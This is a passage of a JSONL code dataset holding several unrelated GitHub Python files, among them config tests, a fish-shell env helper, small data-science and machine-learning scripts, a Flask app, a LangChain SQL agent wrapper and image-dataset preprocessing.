open(cls.server_config_path, 'w+t') as server_config:\n contents = create_config(SERVER_CONFIG_TEMPLATE,\n SERVER_CONFIG_TABLES)\n server_config.write(contents)\n\n cls.table_configs_dir = os.path.join(cls.config_basedir, 'tables.d')\n os.mkdir(cls.table_configs_dir)\n\n cls.table_config_paths = []\n for config_filename, tables in TABLE_CONFIGS.iteritems():\n config_path = os.path.join(cls.table_configs_dir, config_filename)\n cls.table_config_paths.append(config_path)\n with open(config_path, 'w+t') as table_config:\n contents = create_config(TABLE_CONFIG_TEMPLATE, tables)\n table_config.write(contents)\n\n @classmethod\n def tearDownClass(cls):\n for config_path in cls.table_config_paths:\n os.remove(config_path)\n os.removedirs(cls.table_configs_dir)\n\n def test_parse_table_config(self):\n tables = 
tableconfigutils.parse_table_config(self.server_config_path)\n assert len(tables) == len(SERVER_CONFIG_TABLES)\n\n def test_parse_table_configs(self):\n tables = tableconfigutils.parse_table_configs(self.table_configs_dir)\n assert len(tables) == sum(len(tables) for tables in\n TABLE_CONFIGS.values())\n\n def _compare_tables(self, tables_a, tables_b):\n \"\"\"\n Returns True if both lists of tables contain the same table entries\n (order is not important).\n\n `tables_a`: a list of dicts containing table properties as keys\n `tables_b`: a list of dicts containing table properties as keys\n \"\"\"\n if len(tables_a) != len(tables_b):\n return False\n\n seen = {}\n for table in tables_a:\n seen[table['name']] = table\n\n for table in tables_b:\n table_name = table['name']\n if table_name not in seen or table != seen[table_name]:\n return False\n return True\n\n def test_merge_tables_with_no_tables(self):\n assert tableconfigutils.merge_tables([], []) == []\n\n def test_merge_tables_with_no_server_config_tables(self):\n table_config_tables = [\n create_table_dict('One', 'holdem', '2-4-limit'),\n create_table_dict('Two', 'holdem', '5-10-no-limit'),\n create_table_dict('Three', 'omaha8', '3-6-limit')\n ]\n merged_tables = tableconfigutils.merge_tables([], table_config_tables)\n assert self._compare_tables(merged_tables, table_config_tables)\n\n def test_merge_tables_with_no_table_config_tables(self):\n server_config_tables = [\n create_table_dict('One', 'holdem', '2-4-limit'),\n create_table_dict('Two', 'holdem', '5-10-no-limit'),\n create_table_dict('Five', 'omaha', '.10-.20-pot-limit'),\n create_table_dict('Six', 'omaha8', '3-6-limit')\n ]\n merged_tables = tableconfigutils.merge_tables(server_config_tables, [])\n assert self._compare_tables(merged_tables, server_config_tables)\n\n def test_get_all_table_descriptions(self):\n server_config_tables = [create_table_dict(*table) for table in\n SERVER_CONFIG_TABLES]\n server_config = DummyServerConfig(server_config_tables)\n table_descriptions = tableconfigutils.get_table_descriptions(\n server_config, self.table_configs_dir)\n\n expected_tables = [create_table_dict(*table) for table in MERGED_TABLES]\n\n assert self._compare_tables(table_descriptions, expected_tables)\n","repo_name":"hippich/Bitcoin-Poker-Room","sub_path":"lib/ppn/tests/test_tableconfigutils.py","file_name":"test_tableconfigutils.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"61"}
+{"seq_id":"8757726929","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport argparse\nimport os\nfrom subprocess import check_output\nimport sys\n\nimport six\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Modify environment in fish shell with variables from '\n 'script output, e.g. ssh-add.')\n parser.add_argument('ARGS', nargs='*')\n args = parser.parse_args()\n\n if args.ARGS:\n output = check_output('eval $({}) > /dev/null; printenv'\n .format(' '.join(args.ARGS)),\n shell=True)\n new_env = parse_printenv(output)\n else:\n new_env = parse_printenv(sys.stdin)\n\n diff = dict_diff(os.environ, new_env)\n print(fishify(diff))\n\n\ndef parse_printenv(output):\n if isinstance(output, bytes):\n lines = (l for l in output.splitlines())\n elif hasattr(output, 'read'):\n lines = output\n\n env = {}\n for line in lines:\n try:\n decoded = line.decode('utf-8')\n except AttributeError:\n decoded = line\n var, val = decoded.split('=', 1)\n env[var] = val.strip()\n return env\n\n\ndef dict_diff(this, that):\n diff = set(that.keys()) - set(this.keys())\n return {key: that[key] for key in diff}\n\n\ndef fishify(env):\n return '; and '.join('set -x {} {}'.format(k, v)\n for k, v in six.iteritems(env))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Perlence/fishify","sub_path":"fishify.py","file_name":"fishify.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15924293181","text":"import csv\r\nimport numpy as np\r\nimport plotly.express as px\r\ndef plotfigure(data_path):\r\n with open(data_path) as f:\r\n df=csv.DictReader(f)\r\n graph=px.scatter(df,x=\"Coffee in ml\", y=\"sleep in hours\")\r\n graph.show()\r\ndef getdatasource(data_path):\r\n Coffee=[]\r\n Hours=[]\r\n with open(data_path) as f:\r\n reader=csv.DictReader(f)\r\n for row in reader:\r\n Coffee.append(float(row[\"Coffee in ml\"]))\r\n Hours.append(float(row[\"sleep in hours\"]))\r\n return {\"x\":Coffee, \"y\":Hours}\r\n\r\ndef findcorrelation(datasource):\r\n correlation=np.corrcoef(datasource[\"x\"],datasource[\"y\"])\r\n print(\"correlation coefficient: \\n\", correlation[0,1])\r\n\r\ndef setup():\r\n data_path='Coffee.csv'\r\n datasource=getdatasource(data_path)\r\n findcorrelation(datasource)\r\n plotfigure(data_path)\r\nsetup()","repo_name":"SHANVI-PRASAD/correlation","sub_path":"Coffee.py","file_name":"Coffee.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42175906341","text":"from flask import Flask\n\n\ndef create_app():\n app = Flask(__name__)\n\n @app.route(\"/\")\n def hello_world():\n return \"Hello, World!!!!!!!\"\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.run(threaded=True, host='0.0.0.0', port=5000)\n\n","repo_name":"AntonAleksandrov13/devops101","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"15220694026","text":"from langchain.agents import create_sql_agent\nfrom langchain.agents.agent_toolkits import SQLDatabaseToolkit\nfrom langchain.sql_database import SQLDatabase\nfrom langchain.llms.openai import OpenAI\n\nfrom prompts import MSSQL_AGENT_PREFIX\n\n\n\nclass SQLAgent:\n def __init__(self, database_uri: str, llm: OpenAI, tables: list):\n self.database_uri = database_uri\n self.llm = llm\n self.tables = tables\n\n def create(self):\n db = SQLDatabase.from_uri(\n database_uri=self.database_uri,\n sample_rows_in_table_info=1,\n include_tables=self.tables,\n view_support=True,\n )\n\n toolkit = SQLDatabaseToolkit(db=db, llm=self.llm)\n return create_sql_agent(\n llm=self.llm,\n toolkit=toolkit,\n verbose=False,\n prefix=MSSQL_AGENT_PREFIX,\n # format_instructions=SQL_AGENT_FORMAT_INSTRUCTIONS,\n )\n\n async def arun(self, query: str):\n agent = self.create()\n return agent.run(query)\n\n def run(self, query: str):\n agent = self.create()\n return agent.run(query)\n","repo_name":"dpastra-na/matti_ai_lambda_test","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39746220396","text":"#!/bin/env python3\nimport sys, json, gzip\nfrom couchws import *\n\ndb = sys.argv[1]\nrequest = \"/\"+db+\"/\"+\"_all_docs?include_docs=true\"\nresponse = couch_webservice_request(request)\nresult={'docs': []}\ndocs = result['docs']\ndesign = []\nfor it in response['rows']:\n doc = it['doc']\n if '_rev' in doc:\n del doc['_rev']\n docs.append(doc)\nif sys.argv[2].endswith('.gz'):\n wh = gzip.open(sys.argv[2],'w')\n wh.write(json.dumps(result,indent=2).encode())\nelse:\n wh = open(sys.argv[2],'w')\n wh.write(json.dumps(result,indent=2))\nwh.close()\n","repo_name":"Bowen999/Gene_Protein_Disease_Database","sub_path":"scripts/couchdb2file.py","file_name":"couchdb2file.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4580708439","text":"\"\"\"Linear loss regression module\"\"\"\n# -----------------------------------------------------------------------------\n# Module imports\n# -----------------------------------------------------------------------------\n# system\nimport os\nimport sys\n# nd arrays\nimport numpy as np\n# user modules\nsys.path.insert(1, os.path.join(os.path.dirname(__file__), '..', 'ex01'))\nsys.path.insert(1, os.path.join(os.path.dirname(__file__), '..', 'ex06'))\nfrom ridge import type_validator, shape_validator\nfrom l2_reg import l2\n\n\n# -----------------------------------------------------------------------------\n# Regularized linear regression loss\n# -----------------------------------------------------------------------------\n@type_validator\n@shape_validator({'y': ('m', 1), 'y_hat': ('m', 1), 'theta': ('n', 1)})\ndef reg_loss_(y: np.ndarray, y_hat: np.ndarray, theta: np.ndarray,\n lambda_: float) -> float:\n \"\"\"\n Computes the regularized loss of a linear regression model from two\n non-empty numpy.array, without any for loop.Args:\n y: has to be an numpy.ndarray, a vector of shape m * 1.\n y_hat: has to be an numpy.ndarray, a vector of shape m * 1.\n theta: has to be a numpy.ndarray, a vector of shape n * 1.\n lambda_: has to be a float.\n Returns:\n The regularized loss as a float.\n None if y, y_hat, or theta are empty numpy.ndarray.\n None if y and y_hat do not share the same shapes.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n m, _ = y.shape\n loss = float((((y_hat - y).T.dot(y_hat - y)) / (2 * m))[0][0])\n regularization_term = (lambda_ / (2 * m)) * l2(theta)\n return loss + regularization_term\n except:\n return None\n\n\n# -----------------------------------------------------------------------------\n# Tests\n# -----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n\n y = np.array([2, 14, -13, 5, 12, 4, -19]).reshape((-1, 1))\n y_hat = np.array([3, 13, -11.5, 5, 11, 5, -20]).reshape((-1, 1))\n theta = np.array([1, 2.5, 1.5, -0.9]).reshape((-1, 1))\n\n # Example :\n print(f'ex00: {reg_loss_(y, y_hat, theta, .5)}\\n')\n # Output:\n # 0.8503571428571429\n\n # Example :\n print(f'ex01: {reg_loss_(y, y_hat, theta, .05)}\\n')\n # Output:\n # 0.5511071428571429\n\n # Example :\n print(f'ex02: {reg_loss_(y, y_hat, theta, .9)}\\n')\n # Output:\n # 1.116357142857143\n","repo_name":"twagger/bootcamp_machine-learning","sub_path":"module04/ex02/linear_loss_reg.py","file_name":"linear_loss_reg.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11512348801","text":"def general_list(value):\n result = []\n for i in range(value):\n result.append(i)\n return result\n\nprint(general_list(50))\n\nimport sys\nresult = general_list(50)\nprint(sys.getsizeof(result))\n\ndef generator_list(value):\n result = []\n for i in range(value):\n yield i\n\nprint(generator_list(50))\n\nfor a in generator_list(50):\n print(a)\n\n# 제너레이터를 만들면 메모리를 줄일 수 있다.\n# 값이 필요할 때만 호출하여 사용\nresult = generator_list(50)\nprint(sys.getsizeof(result))\n\n# generator comprehension\n# 일반적인 iterator는 generator에 반해 훨씬 큰 메모리 용량을 사용\ngen_ex = (n*n for n in range(500))\nprint(type(gen_ex))\n\n# Why and When generators\nprint(sys.getsizeof(gen_ex))\n\nprint(sys.getsizeof(list(gen_ex)))\n\nlist_ex = [n*n for n in range(500)]\nprint(sys.getsizeof(list_ex))\n","repo_name":"updaun/PythonBasic","sub_path":"pythonic_code/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71589666753","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\n\ndef chatter_callback(message):\n #get_caller_id(): Get fully resolved name of local node\n rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", message.data)\ndef talker():\n\t\t\n print(\"talker entered\")\n \n pub = rospy.Publisher('chatting', String, queue_size=10)\n \n\n \n #set the loop rate\n rate = rospy.Rate(1) # 1hz\n \n i = 0\n while (i<2):\n\t\n hello_str = raw_input()\n rospy.loginfo(hello_str)\n pub.publish(hello_str)\n rate.sleep()\n i=i+1\n\n \n\nrospy.init_node('listener', anonymous=True)\n\n \n \n\nrospy.Subscriber(\"chatter\", String, chatter_callback)\n\n \n \n\nwhile True:\n talker()\n\t\n\t\n\n\n\n\t\t\n","repo_name":"daksh-025/codes","sub_path":"listner.py","file_name":"listner.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26783180210","text":"import argparse\nimport os\nfrom functools import partial\nimport time\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import SubsetRandomSampler\nfrom torchvision.datasets import MNIST\nfrom torchvision import transforms\n\n# Import from local helper file\nfrom helper import parse_cmdline_args\nfrom helper import compute_mae_and_rmse\nfrom helper import resnet34base\n\n\n# Argparse helper\nparser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nargs = parse_cmdline_args(parser)\n\n##########################\n# Settings and Setup\n##########################\n\nNUM_WORKERS = args.numworkers\nLEARNING_RATE = args.learningrate\nNUM_EPOCHS = args.epochs\nBATCH_SIZE = args.batchsize\nOUTPUT_DIR = args.output_dir\nLOSS_PRINT_INTERVAL = args.loss_print_interval\n\nif os.path.exists(args.output_dir):\n raise ValueError('Output directory already exists.')\nelse:\n os.makedirs(args.output_dir)\nBEST_MODEL_PATH = os.path.join(args.output_dir, 'best_model.pt')\nLOGFILE_PATH = os.path.join(args.output_dir, 'training.log')\n\nif args.cuda >= 0 and torch.cuda.is_available():\n DEVICE = torch.device(f'cuda:{args.cuda}')\nelse:\n DEVICE = torch.device('cpu')\n\nif args.seed == -1:\n RANDOM_SEED = None\nelse:\n RANDOM_SEED = args.seed\n\n\n############################\n# Dataset\n############################\n\ndef train_transform():\n return transforms.Compose([transforms.ToTensor()])\n\n\ndef validation_transform():\n return transforms.Compose([transforms.ToTensor()])\n\n\nNUM_CLASSES = 10\nGRAYSCALE = True\nRESNET34_AVGPOOLSIZE = 1\n\ntrain_dataset = MNIST(root='./datasets',\n train=True,\n download=True,\n transform=train_transform())\n\nvalid_dataset = MNIST(root='./datasets',\n train=True,\n transform=validation_transform(),\n download=False)\n\ntest_dataset = MNIST(root='./datasets',\n train=False,\n transform=validation_transform(),\n download=False)\n\ntrain_indices = torch.arange(1000, 60000)\nvalid_indices = torch.arange(0, 1000)\ntrain_sampler = SubsetRandomSampler(train_indices)\nvalid_sampler = SubsetRandomSampler(valid_indices)\n\ntrain_loader = DataLoader(dataset=train_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False, # SubsetRandomSampler shuffles\n drop_last=True,\n num_workers=NUM_WORKERS,\n sampler=train_sampler)\n\nvalid_loader = DataLoader(dataset=valid_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n num_workers=NUM_WORKERS,\n sampler=valid_sampler)\n\ntest_loader = DataLoader(dataset=test_dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n num_workers=NUM_WORKERS)\n\n\n##########################\n# MODEL\n##########################\n\nmodel = resnet34base(\n num_classes=NUM_CLASSES,\n grayscale=GRAYSCALE,\n resnet34_avg_poolsize=RESNET34_AVGPOOLSIZE)\n\n\nmodel.output_layer = torch.nn.Linear(512, NUM_CLASSES)\n\n\ndef forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n\n x = x.view(x.size(0), -1)\n logits = self.output_layer(x)\n return logits\n\n\ndef add_method(obj, func):\n 'Bind a function and store it in an object'\n setattr(obj, func.__name__, partial(func, obj))\n\n\nadd_method(model, forward)\nmodel.to(DEVICE)\noptimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)\n\n\n#######################################\n# Utility Functions\n#######################################\n\n\ndef 
label_from_logits(logits):\n _, predicted_labels = torch.max(logits, 1)\n return predicted_labels\n\n\n#######################################\n# Training\n#######################################\n\n\nbest_valid_mae = torch.tensor(float('inf'))\n\ns = (f'Script: {__file__}\\n'\n f'PyTorch version: {torch.__version__}\\n'\n f'Device: {DEVICE}\\n'\n f'Learning rate: {LEARNING_RATE}\\n'\n f'Batch size: {BATCH_SIZE}\\n')\n\nprint(s)\nwith open(LOGFILE_PATH, 'w') as f:\n f.write(f'{s}\\n')\n\nstart_time = time.time()\n\nfor epoch in range(1, NUM_EPOCHS+1):\n\n model.train()\n for batch_idx, (features, targets) in enumerate(train_loader):\n\n features = features.to(DEVICE)\n targets = targets.to(DEVICE)\n\n # FORWARD AND BACK PROP\n logits = model(features)\n\n # CORN loss\n loss = torch.nn.functional.cross_entropy(logits, targets)\n # ##--------------------------------------------------------------------###\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Logging\n if not batch_idx % LOSS_PRINT_INTERVAL:\n s = (f'Epoch: {epoch:03d}/{NUM_EPOCHS:03d} | '\n f'Batch {batch_idx:04d}/'\n f'{len(train_dataset)//BATCH_SIZE:04d} | '\n f'Loss: {loss:.4f}')\n print(s)\n with open(LOGFILE_PATH, 'a') as f:\n f.write(f'{s}\\n')\n\n # Logging: Evaluate after epoch\n model.eval()\n with torch.no_grad():\n valid_mae, valid_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=valid_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\n if valid_mae < best_valid_mae:\n best_valid_mae = valid_mae\n best_epoch = epoch\n torch.save(model.state_dict(), BEST_MODEL_PATH)\n\n s = (f'MAE Current Valid: {valid_mae:.2f} Ep. {epoch}'\n f' | Best Valid: {best_valid_mae:.2f} Ep. {best_epoch}')\n s += f'\\nTime elapsed: {(time.time() - start_time)/60:.2f} min'\n print(s)\n with open(LOGFILE_PATH, 'a') as f:\n f.write('%s\\n' % s)\n\n\n# Final\nmodel.load_state_dict(torch.load(BEST_MODEL_PATH))\nmodel.eval()\nwith torch.no_grad():\n\n train_mae, train_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=train_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\n valid_mae, valid_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=valid_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\n test_mae, test_rmse = compute_mae_and_rmse(\n model=model,\n data_loader=valid_loader,\n device=DEVICE,\n label_from_logits_func=label_from_logits\n )\n\ns = ('\\n\\n=========================================\\n\\n'\n 'Performance of best model based on validation set MAE:'\n f'Train MAE / RMSE: {train_mae:.2f} / {train_rmse:.2f}'\n f'Valid MAE / RMSE: {valid_mae:.2f} / {valid_rmse:.2f}'\n f'Test MAE / RMSE: {test_mae:.2f} / {test_rmse:.2f}')\n","repo_name":"Raschka-research-group/corn-ordinal-neuralnet","sub_path":"model-code/simple-scripts/resnet34_classifier.py","file_name":"resnet34_classifier.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"}
+{"seq_id":"37462872949","text":"import unittest\nfrom io import BytesIO\nimport streamlit as st\nfrom src.backend.data_manipulation import DataFrameHandler\n\nclass TestDataFrameHandler(unittest.TestCase):\n\n def test_get_num_col(self):\n\n # Make dataframehandler\n ufr = None\n filepath=\"datasets/Iris.csv\"\n with open(filepath, \"rb\") as fh:\n buf = BytesIO(fh.read())\n ufr = st.uploaded_file_manager.UploadedFileRec(1,\"Name\", \"text/csv\", buf.getvalue())\n uf = st.uploaded_file_manager.UploadedFile(ufr)\n\n # Create our inputs\n df_obj = DataFrameHandler(uf)\n \n # Perform calculation\n lst = df_obj.get_numeric_columns()\n\n # unit testing time\n self.assertEqual(lst[0], \"Id\")\n self.assertEqual(lst[1], \"SepalLengthCm\")\n self.assertEqual(lst[2], \"SepalWidthCm\")\n self.assertEqual(lst[3], \"PetalLengthCm\")\n self.assertEqual(lst[4], \"PetalWidthCm\")\n\n def test_get_cat_col(self):\n\n # Make dataframehandler\n ufr = None\n filepath=\"datasets/Iris.csv\"\n with open(filepath, \"rb\") as fh:\n buf = BytesIO(fh.read())\n ufr = st.uploaded_file_manager.UploadedFileRec(1,\"Name\", \"text/csv\", buf.getvalue())\n uf = st.uploaded_file_manager.UploadedFile(ufr)\n\n # Create our inputs\n df_obj = DataFrameHandler(uf)\n \n # Perform calculation\n lst = df_obj.get_categorical_columns()\n\n # unit testing time\n self.assertEqual(lst[0], \"Species\")\n\n def test_get_col_cats(self):\n\n # Make dataframehandler\n ufr = None\n filepath=\"datasets/Iris.csv\"\n with open(filepath, \"rb\") as fh:\n buf = BytesIO(fh.read())\n ufr = st.uploaded_file_manager.UploadedFileRec(1,\"Name\", \"text/csv\", buf.getvalue())\n uf = st.uploaded_file_manager.UploadedFile(ufr)\n\n # Create our inputs\n df_obj = DataFrameHandler(uf)\n \n # Perform calculation\n lst = df_obj.get_column_categories(\"Species\")\n\n # unit testing time\n self.assertEqual(lst[0], \"Iris-setosa\")\n self.assertEqual(lst[1], \"Iris-versicolor\")\n self.assertEqual(lst[2], \"Iris-virginica\")\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"hbaghar/statistics-for-dummies","sub_path":"test/test_DataFrameHandler.py","file_name":"test_DataFrameHandler.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20006134147","text":"#!/home/jeremy/ProjectPython/bin/python\n# -*- coding: utf-8 -*-\n#\n# script.py\n#\n\nimport sys\nimport os\nimport re\nimport logging\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_page(url):\n try:\n rs = requests.get(url)\n except ConnectionError:\n logging.warn('Unable to open {}'.format(url))\n return None\n return BeautifulSoup(rs.text, 'lxml')\n \n \ndef get_text_content(soup):\n body = soup.find('body')\n\n for em in body.findAll('em'):\n parent = em.parent\n text = next(em.stripped_strings, None)\n em.replace_with('*' + text + '* ')\n \n #~ for tag in body.findAll(['style', 'script']):\n #~ tag.dispose()\n\n \n return [dict(name=t.parent.name, text=t.get_text(separator=\"|\", strip=True)) for t in body.findAll('p')] or None\n","repo_name":"jallanxjallan/lib3.6","sub_path":"document/web_page.py","file_name":"web_page.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35082900889","text":"#!/usr/bin/python3\n\"\"\"\nModule: 4-print_square\nFunction: def print_square()\n\"\"\"\n\n\ndef print_square(size):\n \"\"\"\n returns a square '#' defined\n by size\n \"\"\"\n\n if isinstance(size, float) and size < 0 or not isinstance(size, int):\n raise TypeError(\"size must be an integer\")\n\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n\n [print('#' * size) for count in range(size)]\n","repo_name":"cecilia-89/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22790044743","text":"import numpy as np\nimport pickle\nfrom PIL import Image\nimport os\nfrom matplotlib import pyplot as plt\nimport random\nfrom scipy.ndimage import zoom\n\n\ndef clipped_zoom(img, zoom_factor, **kwargs):\n\n h, w = img.shape[:2]\n\n # For multichannel images we don't want to apply the zoom factor to the RGB\n # dimension, so instead we create a tuple of zoom factors, one per array\n # dimension, with 1's for any trailing dimensions after the width and height.\n zoom_tuple = (zoom_factor,) * 2 + (1,) * (img.ndim - 2)\n\n # Zooming out\n if zoom_factor < 1:\n\n # Bounding box of the zoomed-out image within the output array\n zh = int(np.round(h * zoom_factor))\n zw = int(np.round(w * zoom_factor))\n\n top = (h - zh) // 2\n left = (w - zw) // 2\n\n # Zero-padding\n\n out = np.zeros_like(img)\n out[top:top+zh, left:left+zw] = zoom(img, zoom_tuple, **kwargs)\n\n # Zooming in\n elif zoom_factor > 1:\n\n # Bounding box of the zoomed-in region within the input array\n zh = int(np.round(h / zoom_factor))\n zw = int(np.round(w / zoom_factor))\n top = (h - zh) // 2\n left = (w - zw) // 2\n\n\n out = zoom(img[top:top+zh, left:left+zw], zoom_tuple, **kwargs)\n\n # `out` might still be slightly larger than `img` due to rounding, so\n # trim off any extra pixels at the edges\n trim_top = ((out.shape[0] - h) // 2)\n trim_left = ((out.shape[1] - w) // 2)\n\n\n if trim_top<0:\n out = img\n # print(zoom_factor)\n\n else:\n out = out[trim_top:trim_top+h, trim_left:trim_left+w]\n\n\n # If zoom_factor == 1, just return the input array\n else:\n out = img\n\n return out\n\n\n\n\ndef make_oral_cancer(val_splits):\n\ttrain_data = np.zeros([72000, 80, 80])\n\ttrain_label = np.zeros([72000])\n\ttest_data = np.zeros([55000, 80, 80])\n\ttest_label = np.zeros([55000])\n\n\t# train data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Cancer', imagename)).convert('L')\n\t\ttrain_data[i,:,:] = np.asarray(image)\n\t\ttrain_label[i] = 0\n\t\ti += 1\n\t\tif i == 22000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Healthy', imagename)).convert('L')\n\t\ttrain_data[i,:,:] = np.asarray(image)\n\t\ttrain_label[i] = 1\n\t\ti += 1\n\t\tif i == 72000:\n\t\t\tbreak\n\t# test data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Cancer', imagename)).convert('L')\n\t\ttest_data[i,:,:] = np.asarray(image)\n\t\ttest_label[i] = 0\n\t\ti += 1\n\t\tif i == 20000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Healthy', imagename)).convert('L')\n\t\ttest_data[i,:,:] = np.asarray(image)\n\t\ttest_label[i] = 1\n\t\ti += 1\n\t\tif i == 55000:\n\t\t\tbreak\n\n\ttry:\n\t\tos.mkdir('OralCancer/')\n\texcept:\n\t\tNone\n\n\tos.chdir('OralCancer/')\n\n\tfor split in range(val_splits):\n\t\trandom.seed(split)\n\t\tperm = np.random.permutation(train_data.shape[0])\n\t\ttrain_data = train_data[perm,:,:]\n\t\ttrain_label = train_label[perm]\n\n\t\tperm = np.random.permutation(test_data.shape[0])\n\t\ttest_data = test_data[perm,:,:]\n\t\ttest_label = test_label[perm]\n\n\t\tdict = {}\n\t\tdict['train_data'] = train_data\n\t\tdict['train_label'] = train_label\n\t\tdict['test_data'] = test_data\n\t\tdict['test_label'] = 
test_label\n\n\t\tpickle.dump(dict,open('oral_cancer_split_'+ str(split) +'.pickle','wb'), protocol=4)\n\n\n\ndef normalize(image):\n\t# minimum = np.min(image, axis=(0,1), keepdims=True)\n\t# maximum = np.max(image, axis=(0,1), keepdims=True)\n\t# return (image-minimum)/(maximum-minimum)\n\treturn image/255\n\ndef make_oral_caner_scale(val_splits):\n\ttrain_data = np.zeros([70000, 80, 80, 3])\n\ttrain_data_scale = np.zeros([70000, 80, 80, 3])\n\ttrain_label = np.zeros([70000])\n\ttrain_label_scale = np.zeros([70000])\n\ttest_data = np.zeros([50000, 80, 80, 3])\n\ttest_label = np.zeros([50000])\n\n\t# train data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Cancer', imagename))\n\t\timage = np.asarray(image)\n\t\ttrain_data[i,:,:,:] = normalize(image)\n\t\ttrain_label[i] = 0\n\t\t# for augmentation\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttrain_data_scale[i,:,:,:] = normalize(image_scaled)\n\t\ttrain_label_scale[i] = 0\n\t\ti += 1\n\t\tif i == 20000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/train/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/train/Healthy', imagename))\n\t\timage = np.asarray(image)\n\t\ttrain_data[i,:,:,:] = normalize(image)\n\t\ttrain_label[i] = 1\n\t\t# for augmentation\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttrain_data_scale[i,:,:,:] = normalize(image_scaled)\n\t\ttrain_label_scale[i] = 1\n\t\ti += 1\n\t\tif i == 70000:\n\t\t\tbreak\n\t# test data\n\ti = 0\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Cancer'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Cancer', imagename))\n\t\timage = np.asarray(image)\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttest_data[i,:,:,:] = normalize(image_scaled)\n\t\ttest_label[i] = 0\n\t\ti += 1\n\t\tif i == 20000:\n\t\t\tbreak\n\tfor imagename in os.listdir('OralCancer_DataSet3/test/Healthy'):\n\t\timage = Image.open(os.path.join('OralCancer_DataSet3/test/Healthy', imagename))\n\t\timage = np.asarray(image)\n\t\tzoom_factor = 1 + (np.random.rand()*0.3)\n\t\timage_scaled = clipped_zoom(image, zoom_factor, order=3)\n\t\ttest_data[i,:,:,:] = 